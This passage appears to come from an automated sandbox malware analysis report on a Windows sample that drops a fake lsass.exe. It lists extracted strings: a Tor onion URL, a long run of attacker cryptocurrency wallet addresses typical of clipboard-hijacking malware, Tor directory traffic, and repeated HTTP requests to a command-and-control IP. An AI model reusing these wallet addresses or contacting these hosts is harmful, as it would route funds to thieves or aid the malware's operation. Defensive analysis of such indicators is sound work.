Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9
Source: lsass.exe, 00000008.00000002.2589096829.00000000004FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: lsass.exe, 00000008.00000002.2589096829.00000000004FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: Thttp://7fv5nq57k4qvbrpt.onion/
Source: 6K1uYM85lS.exe	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: 6K1uYM85lS.exe	String found in binary or memory: bitcoincash:cosmosaddrbitcoincash:11650607608992768899Laddr15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86nband44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbU24188479bnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3E27440746B23181897bitcoincash:cosmosaddrbitcoincash:11650607608992768899L15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86n44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addraddr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbbnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcbandband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3U24188479E27440746B23181897openTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9
Source: 6K1uYM85lS.exe	String found in binary or memory: http%s://%shttps://Proxy-Proxy-Authenticate:NTLMNegotiateKerberosContent-Length:Transfer-Encoding:chunked:443Host:.onion.onionHTTP/1.0 200 OK
Source: lsass.exe.0.dr	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: lsass.exe.0.dr	String found in binary or memory: bitcoincash:cosmosaddrbitcoincash:11650607608992768899Laddr15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86nband44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbU24188479bnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3E27440746B23181897bitcoincash:cosmosaddrbitcoincash:11650607608992768899L15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86n44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addraddr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbbnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcbandband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3U24188479E27440746B23181897openTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9
Source: lsass.exe.0.dr	String found in binary or memory: http%s://%shttps://Proxy-Proxy-Authenticate:NTLMNegotiateKerberosContent-Length:Transfer-Encoding:chunked:443Host:.onion.onionHTTP/1.0 200 OK

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 9030
Source: unknown	Network traffic detected: HTTP traffic on port 9030 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9030
Source: unknown	Network traffic detected: HTTP traffic on port 9030 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9030
Source: unknown	Network traffic detected: HTTP traffic on port 9030 -> 49757

Source: global traffic	TCP traffic: 192.168.2.6:49726 -> 193.11.164.243:9030
Source: global traffic	TCP traffic: 192.168.2.6:49727 -> 95.217.42.50:1067
Source: global traffic	TCP traffic: 192.168.2.6:49730 -> 178.170.10.3:9001
Source: global traffic	TCP traffic: 192.168.2.6:49731 -> 157.90.77.166:9001
Source: global traffic	TCP traffic: 192.168.2.6:49741 -> 213.32.71.116:9030
Source: global traffic	TCP traffic: 192.168.2.6:49744 -> 51.15.42.19:9030
Source: global traffic	TCP traffic: 192.168.2.6:49757 -> 149.56.45.200:9030
Source: global traffic	TCP traffic: 192.168.2.6:49758 -> 107.189.8.226:9000

Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 193.11.164.243:9030Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.z HTTP/1.1Accept-Encoding: gzipHost: 199.58.81.140Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 86.59.21.38Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 193.11.164.243:9030Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 199.58.81.140Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.z HTTP/1.1Accept-Encoding: gzipHost: 149.56.45.200:9030Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 86.59.21.38Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 131.188.40.189:443Connection: CloseCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 193.11.164.243 193.11.164.243
Source: Joe Sandbox View	IP Address: 199.58.81.140 199.58.81.140
Source: Joe Sandbox View	IP Address: 199.58.81.140 199.58.81.140

Source: Joe Sandbox View

JA3 fingerprint: fc54e0d16d9764783542f0146a98b300

Source: unknown

DNS query: name: api.wipmania.com

Source: global traffic	HTTP traffic detected: GET /c1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93

Source: unknown	HTTPS traffic detected: 149.56.44.47:443 -> 192.168.2.6:49729 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.81.131.84:443 -> 192.168.2.6:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 207.244.78.230:443 -> 192.168.2.6:49735 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.175.235.244:443 -> 192.168.2.6:49736 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.81.131.84:443 -> 192.168.2.6:49759 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.93
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 193.11.164.243

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Code function: 0_2_009B0290 memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,strcmp,InternetCloseHandle,InternetCloseHandle,

0_2_009B0290

Source: global traffic	HTTP traffic detected: GET /c1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 193.11.164.243:9030Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.z HTTP/1.1Accept-Encoding: gzipHost: 199.58.81.140Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 86.59.21.38Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 193.11.164.243:9030Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /c6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 199.58.81.140Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.z HTTP/1.1Accept-Encoding: gzipHost: 149.56.45.200:9030Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 86.59.21.38Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 131.188.40.189:443Connection: CloseCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: api.wipmania.com

